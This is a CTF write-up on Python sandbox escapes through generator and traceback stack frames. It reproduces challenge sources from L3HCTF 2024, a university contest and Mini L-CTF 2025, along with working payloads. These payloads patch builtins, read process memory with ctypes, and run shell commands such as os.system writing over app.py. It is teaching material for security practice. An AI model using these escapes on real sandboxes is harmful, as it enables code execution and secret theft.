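Python Stack Frame Sandbox Escape

Continued from the Mini L-CTF 2025 reproduction notes.

Python sandbox escape via stack frames - 先知社区

Python stack frame sandbox escape - Zer0peach can’t think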

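Generators

Concept

A generator is a special kind of iterator in Python that can be created from an ordinary function or a generator expression. Its defining feature is that it produces values one at a time and keeps its state after each value, so the next call resumes where it left off. This makes generators a good fit for large data sets and lazy evaluation.

A generator function is defined with the yield keyword. yield produces a value and suspends the function while preserving its state. The next time the generator is advanced, execution resumes right after the suspended yield and runs until the next yield or until the function returns.

Example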

def generator():
    a = 1
    while True:
        yield a
        a += 1

g = generator()
print(next(g))
print(next(g))
print(next(g))

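Running it prints 1, 2 and 3, one per line.

The generator can also be consumed in other ways, for example with a for loop: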

def generator():
    a = 1
    for i in range(1,100):
        yield a
        a += 1

g = generator()
for value in g:
    print(value)

Running it prints the integers 1 through 99, one per line.

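Generator attributes

gi_code: the code object of the generator.
gi_frame: the frame (stack frame) object of the generator.
gi_running: whether the generator is currently executing. After a yield and before the code following it resumes, the generator is suspended and this attribute is False (0).
gi_yieldfrom: the object the generator is currently delegating to with yield from, or None.
gi_frame.f_locals: a dict of the local variables in the generator's current frame.

gi_frame is an attribute of generators (coroutines have the analogous cr_frame). It points to the generator's frame object, which represents its execution context and holds the local variables, the bytecode being executed and so on. It is available while the generator is running or suspended and becomes None once the generator has finished.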
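The attributes above can be inspected directly on a live generator. The following is a minimal sketch; the function name counter and the snapshot dict are only illustrative.

```python
def counter():
    a = 1
    while True:
        yield a
        a += 1

g = counter()
next(g)  # yields 1
next(g)  # yields 2; the generator is now suspended at the yield

snapshot = {
    "code_name": g.gi_code.co_name,       # name of the generator function
    "running": g.gi_running,              # False: suspended, not executing
    "locals": dict(g.gi_frame.f_locals),  # local variables of the suspended frame
    "yieldfrom": g.gi_yieldfrom,          # None: no "yield from" in progress
}
print(snapshot)

g.close()
print(g.gi_frame)  # None once the generator has finished
```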

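Frame objects in turn have the f_ family of attributes:

f_locals: a dict of the local variables of the function or method, mapping names to values.
f_globals: a dict of the global variables of the module the function or method belongs to, mapping names to values.
f_code: the code object, which holds the bytecode, constants, variable names and so on.
f_lasti: an integer, the index of the last executed bytecode instruction.
f_back: a reference to the previous frame (the caller), which is what links the call stack together.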
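As a quick illustration of these attributes outside of any sandbox, the sketch below uses inspect.currentframe() to grab the running frame; inner and outer are hypothetical helper names.

```python
import inspect

def inner():
    frame = inspect.currentframe()  # the frame of inner itself
    return {
        "name": frame.f_code.co_name,              # function this frame runs
        "caller": frame.f_back.f_code.co_name,     # previous frame in the stack
        "locals": sorted(frame.f_locals),          # names of local variables
        "same_globals": frame.f_globals is globals(),
        "lasti_is_int": isinstance(frame.f_lasti, int),
    }

def outer():
    return inner()

info = outer()
print(info)
```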

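Escaping the sandbox via stack frames

Obtaining the frame with next

The idea is that the generator's frame object can step back through f_back (the previous frame) until it leaves the sandbox and reaches the outer globals, the global symbol table.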

s3cret = "this is flag"

codes = '''
def waff():
    def f():
        yield g.gi_frame.f_back

    g = f()  # the generator

    frame = next(g)  # the frame that called next(), i.e. waff's frame
    # frame = [x for x in g][0]  # a generator is also an iterator, so a comprehension works too (on Python 3.11 and earlier it adds one extra frame)

    b = frame.f_back.f_back.f_globals['s3cret']  # step back two frames and read the outer globals
    return b
b = waff()
'''
locals = {}
code = compile(codes, "test", "exec")
exec(code, locals)
print(locals["b"])
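  1. next returns whatever yield produces, which here is g.gi_frame.f_back.
  2. Because the generator body refers to g.gi_frame.f_back, the generator object must be bound to the name g (g = f()); the body looks that name up to reach its own frame.
  3. compile(codes, "test", "exec") compiles the source with "test" as its filename, and the "exec" mode means codes is a sequence of statements. The sandbox itself is the separate globals dict passed to exec.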
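To make the third point concrete, here is a small sketch showing that the name passed to compile only ends up as the code object's filename, while the isolation comes from the dict given to exec. The variable names secret, scope and seen are illustrative.

```python
secret = "outer value"  # lives in the outer namespace only

src = '''
try:
    seen = secret          # plain name lookup inside the sandbox
except NameError:
    seen = "NameError"
'''

code = compile(src, "test", "exec")
scope = {}                 # fresh globals: this dict is the actual sandbox
exec(code, scope)

print(code.co_filename)          # the "test" label is just the filename
print(scope["seen"])             # the outer name is not directly visible
print("__builtins__" in scope)   # exec adds __builtins__ when it is missing
```

Direct name lookup fails inside the sandbox, which is why the escape has to go through frame objects instead.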

Tracing the escape path:

s3cret = "this is flag"

codes = '''
def waff():
    def f():
        yield g.gi_frame.f_back

    g = f()  # the generator

    frame = next(g)  # waff's frame (the caller of next)
    print(frame)
    print(frame.f_back)
    print(frame.f_back.f_back)


waff()
'''
locals = {}
code = compile(codes, "test", "exec")
exec(code, locals)

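Running it prints three frame objects: waff, then <module> in test, then <module> in the outer script.

So, starting from the generator frame, the chain is: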

f -> waff -> <module>(test) -> zhan.py
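The same chain can be collected programmatically. The sketch below walks f_back from inside the running generator and records the function names; it stops after three entries because what lies beyond depends on how the outer script is launched. It also shows a CPython detail that explains why the payload evaluates f_back inside the yield expression: once the generator is suspended, its frame no longer links to a caller.

```python
src = '''
def waff():
    def f():
        frame = g.gi_frame  # f's own frame, read while f is running
        names = []
        while frame is not None and len(names) < 3:
            names.append(frame.f_code.co_name)
            frame = frame.f_back
        yield names

    g = f()
    return next(g)

chain = waff()
'''
scope = {}
exec(compile(src, "test", "exec"), scope)
chain = scope["chain"]
print(" -> ".join(chain))

def f():
    yield 1

g = f()
next(g)
suspended_back = g.gi_frame.f_back  # read after the generator has been suspended
print(suspended_back)
```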

Escaping with a loop

When next() is unavailable, a for loop can retrieve the frame instead:

secret = "0xGame{Y0u_@r3_@_Exc3ll3n7_C7f3r}"

code1 = '''
def waff2():
    def f():
        yield g.gi_frame.f_back

    g = f()  # create the generator object

    # Pull the frame out with a for loop instead of next().
    # The loop runs in waff2, so the yielded f_back is waff2's frame.
    for a in g:
        break

    # waff2 -> <module> (text) -> outer script: read the outer globals
    globals_dict = a.f_back.f_back.f_globals
    return globals_dict['secret']

b = waff2()
'''

compiled_code = compile(code1, "text", "exec")

# Run the compiled code in a fresh namespace
exec_locals = {}
exec(compiled_code, exec_locals)

# Print the result
print(exec_locals["b"])
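How many f_back hops are needed depends on how deeply the payload is nested (and, for comprehensions, on the Python version), so a payload can also search the chain instead of hard-coding the depth. The following is a sketch under that assumption; find_global is a hypothetical helper, and host.py stands in for the challenge script that owns the secret.

```python
sandbox_src = '''
def find_global(name):
    def f():
        frame = g.gi_frame.f_back  # start from the caller of the generator
        while frame is not None:
            if name in frame.f_globals:
                yield frame.f_globals[name]
                return
            frame = frame.f_back
        yield None

    g = f()
    for value in g:  # a for loop drives the generator, next() is not needed
        return value

found = find_global("secret")
'''

# Hypothetical host script: defines the secret, then runs the sandboxed code
host_src = '''
secret = "demo-secret"
scope = {}
exec(compile(sandbox_src, "text", "exec"), scope)
found = scope["found"]
'''
host = {"sandbox_src": sandbox_src}
exec(compile(host_src, "host.py", "exec"), host)
print(host["found"])
```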

Once the outer globals are available, you can run things such as:

print(a.f_back.f_globals['__builtins__'].__import__('os').popen('ls /').read())

print(a.f_back.f_globals['flag'])
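The loop form matters because for is syntax rather than a built-in function. A minimal sketch of the difference when the sandbox sets __builtins__ to None; the helper run and the two source strings are illustrative, and the exact exception raised by the failing lookup varies between CPython versions.

```python
src_next = "def f():\n    yield 1\nx = next(f())\n"
src_loop = "def f():\n    yield 1\nfor x in f():\n    pass\n"

def run(src):
    """Execute src with no builtins; return x or the exception type name."""
    scope = {"__builtins__": None}
    try:
        exec(src, scope)
    except Exception as exc:
        return type(exc).__name__
    return scope["x"]

print(run(src_next))  # fails: the name next cannot be resolved
print(run(src_loop))  # works: iteration needs no builtin lookup
```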

Example challenges

L3HCTF 2024

import sys
import os

codes='''
<<codehere>>
'''

try:
    codes.encode("ascii")
except UnicodeEncodeError:
    exit(0)

if "__" in codes:
    print("__ bypass!!")
    exit(0)

codes+="\nres=factorization(c)"
print(codes)
locals={"c":"696287028823439285412516128163589070098246262909373657123513205248504673721763725782111252400832490434679394908376105858691044678021174845791418862932607425950200598200060291023443682438196296552959193310931511695879911797958384622729237086633102190135848913461450985723041407754481986496355123676762688279345454097417867967541742514421793625023908839792826309255544857686826906112897645490957973302912538933557595974247790107119797052793215732276223986103011959886471914076797945807178565638449444649884648281583799341879871243480706581561222485741528460964215341338065078004726721288305399437901175097234518605353898496140160657001466187637392934757378798373716670535613637539637468311719923648905641849133472394335053728987186164141412563575941433170489130760050719104922820370994229626736584948464278494600095254297544697025133049342015490116889359876782318981037912673894441836237479855411354981092887603250217400661295605194527558700876411215998415750392444999450257864683822080257235005982249555861378338228029418186061824474448847008690117195232841650446990696256199968716183007097835159707554255408220292726523159227686505847172535282144212465211879980290126845799443985426297754482370702756554520668240815554441667638597863","__builtins__": None}
res=set()

def blackFunc(oldexit):
    def func(event, args):
        blackList = ["process","os","sys","interpreter","cpython","open","compile","__new__","gc"]
        for i in blackList:
            if i in (event + "".join(str(s) for s in args)).lower():
                print("noooooooooo")
                print(i)
                oldexit(0)
    return func

code = compile(codes, "<judgecode>", "exec")
sys.addaudithook(blackFunc(os._exit))
exec(code,{"__builtins__": None},locals)
print(locals)

p=int(locals["res"][0])
q=int(locals["res"][1])
if(p>1e5 and q>1e5 and p*q==int("696287028823439285412516128163589070098246262909373657123513205248504673721763725782111252400832490434679394908376105858691044678021174845791418862932607425950200598200060291023443682438196296552959193310931511695879911797958384622729237086633102190135848913461450985723041407754481986496355123676762688279345454097417867967541742514421793625023908839792826309255544857686826906112897645490957973302912538933557595974247790107119797052793215732276223986103011959886471914076797945807178565638449444649884648281583799341879871243480706581561222485741528460964215341338065078004726721288305399437901175097234518605353898496140160657001466187637392934757378798373716670535613637539637468311719923648905641849133472394335053728987186164141412563575941433170489130760050719104922820370994229626736584948464278494600095254297544697025133049342015490116889359876782318981037912673894441836237479855411354981092887603250217400661295605194527558700876411215998415750392444999450257864683822080257235005982249555861378338228029418186061824474448847008690117195232841650446990696256199968716183007097835159707554255408220292726523159227686505847172535282144212465211879980290126845799443985426297754482370702756554520668240815554441667638597863")):
    print("Correct!",end="")
else:
    print("Wrong!",end="")

Walking through it from the top:

if "__" in codes:
    print("__ bypass!!")
    exit(0)

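Double underscores are banned in the source text, but a string such as a dictionary key can be built at runtime with '_'*2 to get around the check.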
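A tiny sketch of why this works: the filter inspects the source text, while the key is only assembled when the code runs. The payload string here is illustrative.

```python
payload = "key = '_' * 2 + 'builtins' + '_' * 2"

passes_filter = "__" not in payload  # the same test the challenge applies
scope = {}
exec(payload, scope)

print(passes_filter, scope["key"])
```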

Next, __builtins__ is set to None, so built-in functions such as next cannot be used:

"__builtins__": None

Then comes the audit-hook blacklist, which among other things blocks the gc approach:

def blackFunc(oldexit):
    def func(event, args):
        blackList = ["process","os","sys","interpreter","cpython","open","compile","__new__","gc"]
        for i in blackList:
            if i in (event + "".join(str(s) for s in args)).lower():
                print("noooooooooo")
                print(i)
                oldexit(0)
    return func
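The matching logic of this hook can be tried without installing it (audit hooks cannot be removed once added). The sketch below copies the substring test into a pure function; first_blocked is a hypothetical name, and the argument tuples are simplified stand-ins for real audit event arguments.

```python
BLACKLIST = ["process", "os", "sys", "interpreter", "cpython",
             "open", "compile", "__new__", "gc"]

def first_blocked(event, args):
    """Return the first blacklist word found in event + args, else None."""
    text = (event + "".join(str(s) for s in args)).lower()
    for word in BLACKLIST:
        if word in text:
            return word
    return None

print(first_blocked("import", ("gc",)))         # blocked by "gc"
print(first_blocked("import", ("posixpath",)))  # blocked: "os" is a substring of "posixpath"
print(first_blocked("import", ("ctypes",)))     # not matched by any word
```

Because the test is a plain substring match over the event name and all arguments, it only fires for operations that raise an audit event in the first place.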

Finally there is a conditional check:

if(p>1e5 and q>1e5 and p*q==int("69...441667638597863")):
    print("Correct!",end="")
else:
    print("Wrong!",end="")

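The check requires p and q to both be greater than 100000, and their product to equal int(“69…97863”).

Satisfying this honestly is not realistic, so the approach is to grab a stack frame, escape to the outer script's globals, and replace the int function there so that the if passes.

Payload: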

def new_int(x):  # int(...) is called with one argument, so the replacement must accept it
    return 10001*10002
a = (a.gi_frame.f_back.f_back for i in [1])
a = [x for x in a][0]
builtins = a.f_back.f_globals['_'*2+'builtins'+'_'*2]
builtins.int = new_int

Or, as a complete payload that defines factorization itself:

def factorization(n):
    def my_generator():
        yield gen.gi_frame.f_back.f_back.f_back
    gen = my_generator()
    for item in gen:
        frame = item  # the outer script's frame
    frame.f_globals["_"+"_builtins_"+"_"].setattr(frame.f_globals["_"+"_builtins_"+"_"],'int',lambda x:123456 if x==123456 else 15241383936)
    return (123456,123456)  # both values satisfy the > 1e5 condition
Patching int dynamically
setattr replaces the int type in __builtins__ with a custom lambda:

lambda x: 123456 if x == 123456 else 15241383936
  • When the input is 123456, it returns 123456.
  • Otherwise it returns 15241383936, which is 123456 squared.
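The effect of the patch can be reproduced locally. This is a sketch only: check is a hypothetical stand-in for the challenge's final condition, and the patch is applied to the real builtins module inside try/finally so it is always undone.

```python
import builtins

def check(res, n_str):
    # Same shape as the challenge's condition; int is looked up at call time
    p = int(res[0])
    q = int(res[1])
    return p > 1e5 and q > 1e5 and p * q == int(n_str)

original_int = builtins.int
fake_int = lambda x: 123456 if x == 123456 else 123456 ** 2

try:
    builtins.int = fake_int  # every later int(...) call now hits the lambda
    bypassed = check((123456, 123456), "some number we cannot factor")
finally:
    builtins.int = original_int  # always restore the real int

honest = check((123456, 123456), "15241383937")
print(bypassed, honest)
```

With the patch in place the product check compares 123456 * 123456 against the lambda's fallback value, so it passes regardless of the modulus.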

9th Ocean University of China Information Security Competition: 菜狗工具#2

from flask import *
import io
import time

app = Flask(__name__)
black_list = [
    '__build_class__', '__debug__', '__doc__', '__import__',
    '__loader__', '__name__', '__package__', '__spec__', 'SystemExit',
    'breakpoint', 'compile', 'exit', 'memoryview', 'open', 'quit', 'input'
]
new_builtins = dict([
    (key, val) for key, val in __builtins__.__dict__.items() if key not in black_list
])

flag = "flag{xxxxxx}"
flag = "DISPOSED"

@app.route("/")
def index():
    return redirect("/static/index.html")

@app.post("/run")
def run():
    out = io.StringIO()
    script = str(request.form["script"])

    def wrap_print(*args, **kwargs):
        kwargs["file"] = out
        print(*args, **kwargs)
    new_builtins["print"] = wrap_print

    try:
        exec(script, {"__builtins__": new_builtins})
    except Exception as e:
        wrap_print(e)

    ret = out.getvalue()
    out.close()
    return ret

time.sleep(5) # current source file is deleted
app.run('0.0.0.0', port=9001)

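Recovering the overwritten flag relies on having Python read its own process memory.

In addition, every stack frame keeps a reference to the bytecode it is running and to the frame above it.

Payload1

Use ctypes pointers to read the memory around the address of flag, which effectively reads the original data back out of memory.

The real flag was created before the value that overwrote it, so after getting the address of the fake flag, the payload scans backwards from there.

A char pointer is used here, so each read returns a byte string.

The key detail is to step by a multiple of 8 each time. (Compare the addresses of any two variables and you will find that their difference is a multiple of 8.)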
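Both observations, aligned addresses and reading object contents through a raw pointer, can be checked on a harmless object. The sketch below assumes CPython, where id() is the object's address and the data of a bytes object starts bytes.__basicsize__ - 1 bytes into the object; it uses a bytes value rather than a str because that layout is simpler. The marker value is made up.

```python
import ctypes

marker = b"flag{demo-only}"  # hypothetical value, kept alive by this name
address = id(marker)         # CPython detail: id() is the memory address

# Objects are allocated on aligned addresses, so stepping by 8 stays on boundaries
aligned = address % 8 == 0

# CPython detail: the raw bytes follow the fixed-size object header
offset = bytes.__basicsize__ - 1
recovered = ctypes.string_at(address + offset, len(marker))

print(aligned, recovered)
```

The payload in this section does the same kind of read, except that it does not know the target address and therefore scans backwards in 8-byte steps.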

# Frame depths below assume Python 3.11 or earlier, where the list comprehension runs in its own frame
a = (a.gi_frame.f_back.f_back for i in [1])
a = [x for x in a][0]

b = a.f_back.f_globals
flag_id = id(b['flag'])  # in CPython, id() returns the object's memory address
ctypes = b["__builtins__"].__import__('ctypes')
#print(ctypes)

for i in range(10000):
    txt = ctypes.cast((flag_id-8*i),ctypes.c_char_p).value
    if b"flag" in txt:
        print(txt)
Payload2

Official write-up:

sys = print.__globals__["__builtins__"].__import__('sys')
io = print.__globals__["__builtins__"].__import__('io')
dis = print.__globals__["__builtins__"].__import__('dis')
threading = print.__globals__["__builtins__"].__import__('threading')
print(threading.enumerate())  # all live threads
print(threading.main_thread())  # the main thread
print(threading.main_thread().ident)  # the main thread's identifier
print(sys._current_frames())  # the current frame of every thread
print(sys._current_frames()[threading.main_thread().ident])  # the main thread's frame


frame = sys._current_frames()[threading.main_thread().ident]

while frame is not None:
    out = io.StringIO()  # in-memory text stream
    dis.dis(frame.f_code,file=out)  # disassemble the code object this frame is running
    content = out.getvalue()  # the disassembly text
    out.close()
    print(content)
    frame = frame.f_back
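Disassembling the frames works because reassigning a variable does not touch the constants stored in the code object. A minimal sketch of that effect, using a made-up two-line module in place of the challenge script:

```python
import dis
import io

src = 'flag = "flag{demo}"\nflag = "DISPOSED"\n'
code = compile(src, "demo.py", "exec")

namespace = {}
exec(code, namespace)  # after running, the variable only holds the second value

out = io.StringIO()
dis.dis(code, file=out)  # the listing still shows both string constants
listing = out.getvalue()

print(namespace["flag"])
print("flag{demo}" in code.co_consts, "flag{demo}" in listing)
```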
Payload3

print([].__class__.__base__.__subclasses__()[84].load_module('gc').get_objects())

# index 84 is <class '_frozen_importlib.BuiltinImporter'> here; the index varies between Python versions

Escaping via exception stack frames

miniLCTF_2025/OfficialWriteups/Web/GuessOneGuess-PyBox.md at main · XDSEC/miniLCTF_2025

Source:

from flask import Flask, request, Response
import multiprocessing
import sys
import io
import ast

app = Flask(__name__)

class SandboxVisitor(ast.NodeVisitor):
    forbidden_attrs = {
        "__class__", "__dict__", "__bases__", "__mro__", "__subclasses__",
        "__globals__", "__code__", "__closure__", "__func__", "__self__",
        "__module__", "__import__", "__builtins__", "__base__"
    }
    def visit_Attribute(self, node):
        if isinstance(node.attr, str) and node.attr in self.forbidden_attrs:
            raise ValueError
        self.generic_visit(node)
    def visit_GeneratorExp(self, node):
        raise ValueError

def sandbox_executor(code, result_queue):
    safe_builtins = {
        "print": print,
        "filter": filter,
        "list": list,
        "len": len,
        "addaudithook": sys.addaudithook,
        "Exception": Exception
    }
    safe_globals = {"__builtins__": safe_builtins}

    sys.stdout = io.StringIO()
    sys.stderr = io.StringIO()

    try:
        exec(code, safe_globals)
        output = sys.stdout.getvalue()
        error = sys.stderr.getvalue()
        result_queue.put(("ok", output or error))
    except Exception as e:
        result_queue.put(("err", str(e)))

def safe_exec(code: str, timeout=1):
    code = code.encode().decode('unicode_escape')
    tree = ast.parse(code)
    SandboxVisitor().visit(tree)
    result_queue = multiprocessing.Queue()
    p = multiprocessing.Process(target=sandbox_executor, args=(code, result_queue))
    p.start()
    p.join(timeout=timeout)

    if p.is_alive():
        p.terminate()
        return "Timeout: code took too long to run."

    try:
        status, output = result_queue.get_nowait()
        return output if status == "ok" else f"Error: {output}"
    except:
        return "Error: no output from sandbox."

CODE = """
def my_audit_checker(event,args):
    allowed_events = ["import", "time.sleep", "builtins.input", "builtins.input/result"]
    if not list(filter(lambda x: event == x, allowed_events)):
        raise Exception
    if len(args) > 0:
        raise Exception

addaudithook(my_audit_checker)
print("{}")

"""
badchars = "\"'|&`+-*/()[]{}_."

@app.route('/')
def index():
    return open(__file__, 'r').read()

@app.route('/execute',methods=['POST'])
def execute():
    text = request.form['text']
    for char in badchars:
        if char in text:
            return Response("Error", status=400)
    output=safe_exec(CODE.format(text))
    if len(output)>5:
        return Response("Error", status=400)
    return Response(output, status=200)


if __name__ == '__main__':
    app.run(host='0.0.0.0')

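This technique works as long as Exception has not been disabled.

Raise an exception inside try/except, use __traceback__ to locate the frame where the exception occurred, then step back to the frame above it: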

try:
    1/0
except Exception as e:
    frame = e.__traceback__.tb_frame.f_back
    builtins = frame.f_globals['__builtins__']
    builtins.exec("builtins.__import__('os').system('ls / -al > app.py')")
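  1. 1/0 deliberately raises an exception so that execution enters the except block with an exception object.
  2. Once caught, e carries the full stack information through its __traceback__ attribute.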
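One reason this route fits the challenge above is that its AST filter rejects generator expressions and a fixed set of dunder attributes, and __traceback__ is not in that set. The sketch below reruns a trimmed copy of the visitor on a few snippets; is_allowed is a hypothetical helper, and the other checks in the challenge (badchars, the audit hook) are not modelled.

```python
import ast

class SandboxVisitor(ast.NodeVisitor):
    # Trimmed copy of the challenge's forbidden attribute set
    forbidden_attrs = {"__class__", "__globals__", "__builtins__", "__subclasses__"}

    def visit_Attribute(self, node):
        if node.attr in self.forbidden_attrs:
            raise ValueError(node.attr)
        self.generic_visit(node)

    def visit_GeneratorExp(self, node):
        raise ValueError("generator expression")

def is_allowed(src):
    """Return True if the visitor accepts the source, False if it raises."""
    try:
        SandboxVisitor().visit(ast.parse(src))
    except ValueError:
        return False
    return True

exception_route = (
    "try:\n"
    "    1/0\n"
    "except Exception as e:\n"
    "    frame = e.__traceback__.tb_frame.f_back\n"
    "    b = frame.f_globals['__builtins__']\n"
)
print(is_allowed(exception_route))                         # accepted
print(is_allowed("a = (a.gi_frame.f_back for i in [1])"))  # rejected: generator expression
print(is_allowed("x.__class__"))                           # rejected: forbidden attribute
```

Note that '__builtins__' passes when it appears as a subscript string, since the visitor only inspects attribute names.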

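The __traceback__ attribute

  • Definition: when an exception is raised, the exception object gets a __traceback__ attribute that points to a traceback object. That object describes the call stack at the point of the exception, including file names, line numbers and function names.
  • Purpose: debugging and logging, to help developers understand the context in which the exception occurred.
  • Access: through the __traceback__ attribute of the exception object.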

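The tb_frame attribute

  • Definition: a traceback object has a tb_frame attribute that points to the stack frame at that level of the traceback. The frame object holds that level's local variables, global variables and so on.
  • Purpose: deeper debugging, since it exposes the variable state at the time of the exception.
  • Access: through the tb_frame attribute of the traceback object.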
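Putting the two attributes together, the following sketch shows that tb_frame is the frame in which the exception was caught and that its f_back is the caller, which is the hop the payload relies on. inner and outer are illustrative names.

```python
def inner():
    try:
        1 / 0
    except Exception as e:
        tb = e.__traceback__
        here = tb.tb_frame  # frame of inner, where the exception was raised and caught
        return here.f_code.co_name, here.f_back.f_code.co_name

def outer():
    return inner()

current, caller = outer()
print(current, caller)
```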